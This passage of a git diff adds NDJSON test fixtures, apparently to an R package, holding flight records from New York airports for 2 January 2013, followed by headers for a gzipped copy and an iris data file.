+{"year":2013,"month":1,"day":2,"dep_time":641,"sched_dep_time":635,"dep_delay":6,"arr_time":1013,"sched_arr_time":940,"arr_delay":33,"carrier":"AA","flight":711,"tailnum":"N3CFAA","origin":"LGA","dest":"DFW","air_time":249,"distance":1389,"hour":6,"minute":35,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":641,"sched_dep_time":647,"dep_delay":-6,"arr_time":804,"sched_arr_time":810,"arr_delay":-6,"carrier":"B6","flight":102,"tailnum":"N766JB","origin":"JFK","dest":"BUF","air_time":60,"distance":301,"hour":6,"minute":47,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":641,"sched_dep_time":645,"dep_delay":-4,"arr_time":930,"sched_arr_time":935,"arr_delay":-5,"carrier":"B6","flight":389,"tailnum":"N563JB","origin":"LGA","dest":"MCO","air_time":142,"distance":950,"hour":6,"minute":45,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":642,"sched_dep_time":630,"dep_delay":12,"arr_time":854,"sched_arr_time":841,"arr_delay":13,"carrier":"US","flight":1433,"tailnum":"N538UW","origin":"LGA","dest":"CLT","air_time":109,"distance":544,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":647,"sched_dep_time":645,"dep_delay":2,"arr_time":849,"sched_arr_time":916,"arr_delay":-27,"carrier":"UA","flight":320,"tailnum":"N587UA","origin":"LGA","dest":"DEN","air_time":218,"distance":1620,"hour":6,"minute":45,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":647,"sched_dep_time":646,"dep_delay":1,"arr_time":738,"sched_arr_time":809,"arr_delay":-31,"carrier":"UA","flight":785,"tailnum":"N821UA","origin":"EWR","dest":"BOS","air_time":34,"distance":200,"hour":6,"minute":46,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":647,"sched_dep_time":645,"dep_delay":2,"arr_time":903,"sched_arr_time":848,"arr_delay":15,"carrier":"US","flight":926,"tailnum":"N565UW","origin":"EWR","dest":"CLT","air_time":102,"distance":529,"hour":6,"minute":45,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":649,"sched_dep_time":655,"dep_delay":-6,"arr_time":951,"sched_arr_time":1030,"arr_delay":-39,"carrier":"DL","flight":1415,"tailnum":"N374DA","origin":"JFK","dest":"SLC","air_time":274,"distance":1990,"hour":6,"minute":55,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":649,"sched_dep_time":651,"dep_delay":-2,"arr_time":934,"sched_arr_time":946,"arr_delay":-12,"carrier":"UA","flight":392,"tailnum":"N464UA","origin":"EWR","dest":"MCO","air_time":141,"distance":937,"hour":6,"minute":51,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":654,"sched_dep_time":700,"dep_delay":-6,"arr_time":946,"sched_arr_time":1045,"arr_delay":-59,"carrier":"DL","flight":1865,"tailnum":"N711ZX","origin":"JFK","dest":"SFO","air_time":323,"distance":2586,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":654,"sched_dep_time":651,"dep_delay":3,"arr_time":1003,"sched_arr_time":955,"arr_delay":8,"carrier":"UA","flight":1701,"tailnum":"N78285","origin":"EWR","dest":"FLL","air_time":168,"distance":1065,"hour":6,"minute":51,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":655,"sched_dep_time":659,"dep_delay":-4,"arr_time":955,"sched_arr_time":959,"arr_delay":-4,"carrier":"AA","flight":1815,"tailnum":"N5EUAA","origin":"JFK","dest":"MCO","air_time":144,"distance":944,"hour":6,"minute":59,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":655,"sched_dep_time":655,"dep_delay":0,"arr_time":929,"sched_arr_time":942,"arr_delay":-13,"carrier":"B6","flight":203,"tailnum":"N651JB","origin":"JFK","dest":"LAS","air_time":297,"distance":2248,"hour":6,"minute":55,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":655,"sched_dep_time":700,"dep_delay":-5,"arr_time":1031,"sched_arr_time":1034,"arr_delay":-3,"carrier":"DL","flight":763,"tailnum":"N705TW","origin":"JFK","dest":"LAX","air_time":317,"distance":2475,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":655,"sched_dep_time":700,"dep_delay":-5,"arr_time":1005,"sched_arr_time":1009,"arr_delay":-4,"carrier":"DL","flight":1383,"tailnum":"N378NW","origin":"LGA","dest":"PBI","air_time":162,"distance":1035,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":655,"sched_dep_time":700,"dep_delay":-5,"arr_time":1015,"sched_arr_time":1020,"arr_delay":-5,"carrier":"DL","flight":2003,"tailnum":"N926DL","origin":"LGA","dest":"MIA","air_time":161,"distance":1096,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":656,"sched_dep_time":700,"dep_delay":-4,"arr_time":1013,"sched_arr_time":1007,"arr_delay":6,"carrier":"B6","flight":981,"tailnum":"N656JB","origin":"JFK","dest":"FLL","air_time":162,"distance":1069,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":656,"sched_dep_time":705,"dep_delay":-9,"arr_time":1014,"sched_arr_time":940,"arr_delay":34,"carrier":"MQ","flight":4534,"tailnum":"N719MQ","origin":"LGA","dest":"XNA","air_time":233,"distance":1147,"hour":7,"minute":5,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":657,"sched_dep_time":700,"dep_delay":-3,"arr_time":806,"sched_arr_time":809,"arr_delay":-3,"carrier":"US","flight":2163,"tailnum":"N945UW","origin":"LGA","dest":"DCA","air_time":46,"distance":214,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":659,"sched_dep_time":700,"dep_delay":-1,"arr_time":959,"sched_arr_time":1025,"arr_delay":-26,"carrier":"VX","flight":399,"tailnum":"N626VA","origin":"JFK","dest":"LAX","air_time":330,"distance":2475,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":700,"sched_dep_time":630,"dep_delay":30,"arr_time":917,"sched_arr_time":840,"arr_delay":37,"carrier":"EV","flight":4471,"tailnum":"N17984","origin":"EWR","dest":"CLT","air_time":102,"distance":529,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":700,"sched_dep_time":700,"dep_delay":0,"arr_time":851,"sched_arr_time":850,"arr_delay":1,"carrier":"AA","flight":305,"tailnum":"N436AA","origin":"LGA","dest":"ORD","air_time":122,"distance":733,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":700,"sched_dep_time":700,"dep_delay":0,"arr_time":1017,"sched_arr_time":1015,"arr_delay":2,"carrier":"AA","flight":2279,"tailnum":"N3JJAA","origin":"LGA","dest":"MIA","air_time":163,"distance":1096,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":701,"sched_dep_time":705,"dep_delay":-4,"arr_time":1001,"sched_arr_time":943,"arr_delay":18,"carrier":"DL","flight":1445,"tailnum":"N339NB","origin":"LGA","dest":"MSY","air_time":193,"distance":1183,"hour":7,"minute":5,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":702,"sched_dep_time":700,"dep_delay":2,"arr_time":1054,"sched_arr_time":1008,"arr_delay":46,"carrier":"UA","flight":756,"tailnum":"N574UA","origin":"EWR","dest":"TPA","air_time":164,"distance":997,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":704,"sched_dep_time":655,"dep_delay":9,"arr_time":947,"sched_arr_time":921,"arr_delay":26,"carrier":"B6","flight":117,"tailnum":"N236JB","origin":"JFK","dest":"MSY","air_time":192,"distance":1182,"hour":6,"minute":55,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":704,"sched_dep_time":705,"dep_delay":-1,"arr_time":908,"sched_arr_time":913,"arr_delay":-5,"carrier":"DL","flight":831,"tailnum":"N974DL","origin":"LGA","dest":"DTW","air_time":90,"distance":502,"hour":7,"minute":5,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":704,"sched_dep_time":700,"dep_delay":4,"arr_time":1142,"sched_arr_time":1154,"arr_delay":-12,"carrier":"UA","flight":1152,"tailnum":"N37456","origin":"EWR","dest":"SJU","air_time":194,"distance":1608,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":705,"sched_dep_time":630,"dep_delay":35,"arr_time":1209,"sched_arr_time":1140,"arr_delay":29,"carrier":"AA","flight":413,"tailnum":"N3GEAA","origin":"JFK","dest":"SJU","air_time":197,"distance":1598,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":705,"sched_dep_time":710,"dep_delay":-5,"arr_time":827,"sched_arr_time":850,"arr_delay":-23,"carrier":"MQ","flight":3737,"tailnum":"N512MQ","origin":"EWR","dest":"ORD","air_time":115,"distance":719,"hour":7,"minute":10,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":707,"sched_dep_time":715,"dep_delay":-8,"arr_time":1022,"sched_arr_time":1045,"arr_delay":-23,"carrier":"AA","flight":443,"tailnum":"N3HYAA","origin":"JFK","dest":"MIA","air_time":160,"distance":1089,"hour":7,"minute":15,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":709,"sched_dep_time":700,"dep_delay":9,"arr_time":1006,"sched_arr_time":1014,"arr_delay":-8,"carrier":"B6","flight":671,"tailnum":"N583JB","origin":"JFK","dest":"LAX","air_time":327,"distance":2475,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":712,"sched_dep_time":700,"dep_delay":12,"arr_time":945,"sched_arr_time":941,"arr_delay":4,"carrier":"DL","flight":1547,"tailnum":"N541US","origin":"LGA","dest":"ATL","air_time":125,"distance":762,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":712,"sched_dep_time":700,"dep_delay":12,"arr_time":844,"sched_arr_time":832,"arr_delay":12,"carrier":"UA","flight":1223,"tailnum":"N76254","origin":"LGA","dest":"ORD","air_time":127,"distance":733,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":714,"sched_dep_time":715,"dep_delay":-1,"arr_time":1026,"sched_arr_time":1035,"arr_delay":-9,"carrier":"AA","flight":825,"tailnum":"N3BAAA","origin":"JFK","dest":"FLL","air_time":161,"distance":1069,"hour":7,"minute":15,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":715,"sched_dep_time":721,"dep_delay":-6,"arr_time":1013,"sched_arr_time":1012,"arr_delay":1,"carrier":"B6","flight":987,"tailnum":"N625JB","origin":"JFK","dest":"MCO","air_time":144,"distance":944,"hour":7,"minute":21,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":715,"sched_dep_time":715,"dep_delay":0,"arr_time":1047,"sched_arr_time":1112,"arr_delay":-25,"carrier":"UA","flight":223,"tailnum":"N517UA","origin":"JFK","dest":"SFO","air_time":341,"distance":2586,"hour":7,"minute":15,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":719,"sched_dep_time":720,"dep_delay":-1,"arr_time":1027,"sched_arr_time":1029,"arr_delay":-2,"carrier":"UA","flight":1526,"tailnum":"N33284","origin":"EWR","dest":"RSW","air_time":168,"distance":1068,"hour":7,"minute":20,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":720,"sched_dep_time":600,"dep_delay":80,"arr_time":905,"sched_arr_time":735,"arr_delay":90,"carrier":"MQ","flight":3768,"tailnum":"N520MQ","origin":"EWR","dest":"ORD","air_time":112,"distance":719,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":722,"sched_dep_time":725,"dep_delay":-3,"arr_time":949,"sched_arr_time":1030,"arr_delay":-41,"carrier":"AS","flight":11,"tailnum":"N592AS","origin":"EWR","dest":"SEA","air_time":314,"distance":2402,"hour":7,"minute":25,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":723,"sched_dep_time":713,"dep_delay":10,"arr_time":846,"sched_arr_time":849,"arr_delay":-3,"carrier":"UA","flight":393,"tailnum":"N529UA","origin":"EWR","dest":"ORD","air_time":114,"distance":719,"hour":7,"minute":13,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":724,"sched_dep_time":730,"dep_delay":-6,"arr_time":1039,"sched_arr_time":1115,"arr_delay":-36,"carrier":"VX","flight":11,"tailnum":"N847VA","origin":"JFK","dest":"SFO","air_time":344,"distance":2586,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":727,"sched_dep_time":645,"dep_delay":42,"arr_time":1024,"sched_arr_time":1028,"arr_delay":-4,"carrier":"UA","flight":277,"tailnum":"N820UA","origin":"EWR","dest":"SNA","air_time":338,"distance":2434,"hour":6,"minute":45,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":728,"sched_dep_time":730,"dep_delay":-2,"arr_time":1001,"sched_arr_time":952,"arr_delay":9,"carrier":"UA","flight":311,"tailnum":"N413UA","origin":"EWR","dest":"DEN","air_time":251,"distance":1605,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":729,"sched_dep_time":720,"dep_delay":9,"arr_time":846,"sched_arr_time":840,"arr_delay":6,"carrier":"FL","flight":850,"tailnum":"N982AT","origin":"LGA","dest":"MKE","air_time":113,"distance":738,"hour":7,"minute":20,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":729,"sched_dep_time":729,"dep_delay":0,"arr_time":1047,"sched_arr_time":1039,"arr_delay":8,"carrier":"B6","flight":1601,"tailnum":"N645JB","origin":"LGA","dest":"RSW","air_time":168,"distance":1080,"hour":7,"minute":29,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":729,"sched_dep_time":730,"dep_delay":-1,"arr_time":1011,"sched_arr_time":1056,"arr_delay":-45,"carrier":"DL","flight":495,"tailnum":"N3768","origin":"JFK","dest":"SEA","air_time":309,"distance":2422,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":730,"sched_dep_time":715,"dep_delay":15,"arr_time":1206,"sched_arr_time":1206,"arr_delay":0,"carrier":"B6","flight":715,"tailnum":"N559JB","origin":"JFK","dest":"SJU","air_time":187,"distance":1598,"hour":7,"minute":15,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":732,"sched_dep_time":730,"dep_delay":2,"arr_time":1105,"sched_arr_time":1100,"arr_delay":5,"carrier":"AA","flight":33,"tailnum":"N322AA","origin":"JFK","dest":"LAX","air_time":351,"distance":2475,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":732,"sched_dep_time":736,"dep_delay":-4,"arr_time":914,"sched_arr_time":850,"arr_delay":24,"carrier":"B6","flight":44,"tailnum":"N506JB","origin":"JFK","dest":"SYR","air_time":50,"distance":209,"hour":7,"minute":36,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":732,"sched_dep_time":732,"dep_delay":0,"arr_time":1047,"sched_arr_time":1040,"arr_delay":7,"carrier":"UA","flight":1509,"tailnum":"N73291","origin":"LGA","dest":"IAH","air_time":230,"distance":1416,"hour":7,"minute":32,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":733,"sched_dep_time":735,"dep_delay":-2,"arr_time":902,"sched_arr_time":858,"arr_delay":4,"carrier":"B6","flight":20,"tailnum":"N337JB","origin":"JFK","dest":"ROC","air_time":57,"distance":264,"hour":7,"minute":35,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":733,"sched_dep_time":737,"dep_delay":-4,"arr_time":1043,"sched_arr_time":1113,"arr_delay":-30,"carrier":"B6","flight":643,"tailnum":"N804JB","origin":"JFK","dest":"SFO","air_time":335,"distance":2586,"hour":7,"minute":37,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":734,"sched_dep_time":700,"dep_delay":34,"arr_time":1045,"sched_arr_time":1025,"arr_delay":20,"carrier":"WN","flight":20,"tailnum":"N485WN","origin":"EWR","dest":"HOU","air_time":235,"distance":1411,"hour":7,"minute":0,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":734,"sched_dep_time":732,"dep_delay":2,"arr_time":844,"sched_arr_time":853,"arr_delay":-9,"carrier":"UA","flight":1199,"tailnum":"N37408","origin":"EWR","dest":"BOS","air_time":34,"distance":200,"hour":7,"minute":32,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":737,"sched_dep_time":745,"dep_delay":-8,"arr_time":1042,"sched_arr_time":1036,"arr_delay":6,"carrier":"B6","flight":983,"tailnum":"N504JB","origin":"LGA","dest":"TPA","air_time":162,"distance":1010,"hour":7,"minute":45,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":738,"sched_dep_time":745,"dep_delay":-7,"arr_time":926,"sched_arr_time":930,"arr_delay":-4,"carrier":"AA","flight":309,"tailnum":"N528AA","origin":"LGA","dest":"ORD","air_time":121,"distance":733,"hour":7,"minute":45,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":739,"sched_dep_time":745,"dep_delay":-6,"arr_time":1116,"sched_arr_time":1125,"arr_delay":-9,"carrier":"AA","flight":59,"tailnum":"N325AA","origin":"JFK","dest":"SFO","air_time":353,"distance":2586,"hour":7,"minute":45,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":739,"sched_dep_time":735,"dep_delay":4,"arr_time":1033,"sched_arr_time":1031,"arr_delay":2,"carrier":"UA","flight":1296,"tailnum":"N19117","origin":"EWR","dest":"MCO","air_time":144,"distance":937,"hour":7,"minute":35,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":740,"sched_dep_time":740,"dep_delay":0,"arr_time":1025,"sched_arr_time":1015,"arr_delay":10,"carrier":"WN","flight":1581,"tailnum":"N468WN","origin":"LGA","dest":"DEN","air_time":263,"distance":1620,"hour":7,"minute":40,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":741,"sched_dep_time":743,"dep_delay":-2,"arr_time":932,"sched_arr_time":920,"arr_delay":12,"carrier":"EV","flight":4348,"tailnum":"N14542","origin":"EWR","dest":"GSO","air_time":94,"distance":445,"hour":7,"minute":43,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":741,"sched_dep_time":740,"dep_delay":1,"arr_time":1005,"sched_arr_time":1019,"arr_delay":-14,"carrier":"UA","flight":328,"tailnum":"N533UA","origin":"LGA","dest":"DEN","air_time":220,"distance":1620,"hour":7,"minute":40,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":743,"sched_dep_time":745,"dep_delay":-2,"arr_time":858,"sched_arr_time":857,"arr_delay":1,"carrier":"9E","flight":3373,"tailnum":"N902XJ","origin":"JFK","dest":"PHL","air_time":30,"distance":94,"hour":7,"minute":45,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":744,"sched_dep_time":730,"dep_delay":14,"arr_time":1017,"sched_arr_time":1007,"arr_delay":10,"carrier":"DL","flight":807,"tailnum":"N989DL","origin":"EWR","dest":"ATL","air_time":128,"distance":746,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":745,"sched_dep_time":730,"dep_delay":15,"arr_time":1112,"sched_arr_time":1040,"arr_delay":32,"carrier":"AA","flight":715,"tailnum":"N455AA","origin":"LGA","dest":"DFW","air_time":244,"distance":1389,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":745,"sched_dep_time":746,"dep_delay":-1,"arr_time":1118,"sched_arr_time":1129,"arr_delay":-11,"carrier":"UA","flight":1668,"tailnum":"N37287","origin":"EWR","dest":"SFO","air_time":350,"distance":2565,"hour":7,"minute":46,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":747,"sched_dep_time":749,"dep_delay":-2,"arr_time":1051,"sched_arr_time":1054,"arr_delay":-3,"carrier":"B6","flight":341,"tailnum":"N508JB","origin":"JFK","dest":"SRQ","air_time":167,"distance":1041,"hour":7,"minute":49,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":750,"sched_dep_time":725,"dep_delay":25,"arr_time":1048,"sched_arr_time":1020,"arr_delay":28,"carrier":"UA","flight":1724,"tailnum":"N79521","origin":"EWR","dest":"PBI","air_time":151,"distance":1023,"hour":7,"minute":25,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":751,"sched_dep_time":800,"dep_delay":-9,"arr_time":942,"sched_arr_time":945,"arr_delay":-3,"carrier":"9E","flight":3643,"tailnum":"N8869B","origin":"JFK","dest":"PIT","air_time":68,"distance":340,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":752,"sched_dep_time":800,"dep_delay":-8,"arr_time":956,"sched_arr_time":959,"arr_delay":-3,"carrier":"EV","flight":4166,"tailnum":"N11536","origin":"EWR","dest":"GSP","air_time":109,"distance":594,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":752,"sched_dep_time":800,"dep_delay":-8,"arr_time":912,"sched_arr_time":918,"arr_delay":-6,"carrier":"EV","flight":4233,"tailnum":"N21130","origin":"EWR","dest":"BTV","air_time":49,"distance":266,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":752,"sched_dep_time":745,"dep_delay":7,"arr_time":1055,"sched_arr_time":1042,"arr_delay":13,"carrier":"UA","flight":251,"tailnum":"N430UA","origin":"EWR","dest":"IAH","air_time":215,"distance":1400,"hour":7,"minute":45,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":754,"sched_dep_time":635,"dep_delay":79,"arr_time":900,"sched_arr_time":745,"arr_delay":75,"carrier":"EV","flight":4241,"tailnum":"N22909","origin":"EWR","dest":"DCA","air_time":46,"distance":199,"hour":6,"minute":35,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":754,"sched_dep_time":755,"dep_delay":-1,"arr_time":1055,"sched_arr_time":1059,"arr_delay":-4,"carrier":"DL","flight":2263,"tailnum":"N361NW","origin":"LGA","dest":"MCO","air_time":143,"distance":950,"hour":7,"minute":55,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":755,"sched_dep_time":800,"dep_delay":-5,"arr_time":1100,"sched_arr_time":1054,"arr_delay":6,"carrier":"B6","flight":517,"tailnum":"N703JB","origin":"EWR","dest":"MCO","air_time":146,"distance":937,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":755,"sched_dep_time":800,"dep_delay":-5,"arr_time":1048,"sched_arr_time":1106,"arr_delay":-18,"carrier":"B6","flight":3,"tailnum":"N509JB","origin":"JFK","dest":"FLL","air_time":155,"distance":1069,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":755,"sched_dep_time":759,"dep_delay":-4,"arr_time":1037,"sched_arr_time":1039,"arr_delay":-2,"carrier":"DL","flight":2047,"tailnum":"N660DL","origin":"LGA","dest":"ATL","air_time":123,"distance":762,"hour":7,"minute":59,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":757,"sched_dep_time":800,"dep_delay":-3,"arr_time":1058,"sched_arr_time":1127,"arr_delay":-29,"carrier":"DL","flight":1843,"tailnum":"N918DL","origin":"JFK","dest":"MIA","air_time":155,"distance":1089,"hour":8,"minute":0,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":757,"sched_dep_time":759,"dep_delay":-2,"arr_time":1018,"sched_arr_time":959,"arr_delay":19,"carrier":"US","flight":1733,"tailnum":"N537UW","origin":"LGA","dest":"CLT","air_time":106,"distance":544,"hour":7,"minute":59,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":758,"sched_dep_time":755,"dep_delay":3,"arr_time":1052,"sched_arr_time":1110,"arr_delay":-18,"carrier":"AA","flight":2267,"tailnum":"N3CNAA","origin":"LGA","dest":"MIA","air_time":160,"distance":1096,"hour":7,"minute":55,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":759,"sched_dep_time":805,"dep_delay":-6,"arr_time":901,"sched_arr_time":919,"arr_delay":-18,"carrier":"B6","flight":1172,"tailnum":"N309JB","origin":"EWR","dest":"BOS","air_time":38,"distance":200,"hour":8,"minute":5,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":800,"sched_dep_time":810,"dep_delay":-10,"arr_time":1102,"sched_arr_time":1116,"arr_delay":-14,"carrier":"DL","flight":1959,"tailnum":"N995DL","origin":"JFK","dest":"MCO","air_time":143,"distance":944,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":801,"sched_dep_time":730,"dep_delay":31,"arr_time":1136,"sched_arr_time":1040,"arr_delay":56,"carrier":"AA","flight":2083,"tailnum":"N487AA","origin":"EWR","dest":"DFW","air_time":241,"distance":1372,"hour":7,"minute":30,"time_hour":"2013-01-02 07:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":801,"sched_dep_time":810,"dep_delay":-9,"arr_time":951,"sched_arr_time":955,"arr_delay":-4,"carrier":"MQ","flight":4406,"tailnum":"N837MQ","origin":"JFK","dest":"RDU","air_time":86,"distance":427,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":804,"sched_dep_time":805,"dep_delay":-1,"arr_time":1039,"sched_arr_time":1110,"arr_delay":-31,"carrier":"UA","flight":423,"tailnum":"N528UA","origin":"EWR","dest":"PDX","air_time":310,"distance":2434,"hour":8,"minute":5,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":806,"sched_dep_time":810,"dep_delay":-4,"arr_time":1300,"sched_arr_time":1315,"arr_delay":-15,"carrier":"AA","flight":655,"tailnum":"N5FTAA","origin":"JFK","dest":"STT","air_time":193,"distance":1623,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":807,"sched_dep_time":810,"dep_delay":-3,"arr_time":1133,"sched_arr_time":1129,"arr_delay":4,"carrier":"DL","flight":1271,"tailnum":"N322US","origin":"JFK","dest":"FLL","air_time":170,"distance":1069,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":808,"sched_dep_time":810,"dep_delay":-2,"arr_time":1049,"sched_arr_time":1045,"arr_delay":4,"carrier":"DL","flight":269,"tailnum":"N971DL","origin":"JFK","dest":"ATL","air_time":124,"distance":760,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":808,"sched_dep_time":815,"dep_delay":-7,"arr_time":1020,"sched_arr_time":1016,"arr_delay":4,"carrier":"US","flight":675,"tailnum":"N656AW","origin":"EWR","dest":"CLT","air_time":107,"distance":529,"hour":8,"minute":15,"time_hour":"2013-01-02 08:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":809,"sched_dep_time":810,"dep_delay":-1,"arr_time":950,"sched_arr_time":948,"arr_delay":2,"carrier":"B6","flight":1051,"tailnum":"N304JB","origin":"JFK","dest":"PIT","air_time":71,"distance":340,"hour":8,"minute":10,"time_hour":"2013-01-02 08:00:00"} diff --git a/tests/testthat/ndjson/flights.ndjson.gz b/tests/testthat/ndjson/flights.ndjson.gz new file mode 100644 index 0000000..f122b9e Binary files /dev/null and b/tests/testthat/ndjson/flights.ndjson.gz differ diff --git a/tests/testthat/ndjson/iris.ndjson b/tests/testthat/ndjson/iris.ndjson new file mode 100644 index 0000000..92ba94c --- /dev/null +++ b/tests/testthat/ndjson/iris.ndjson @@ -0,0 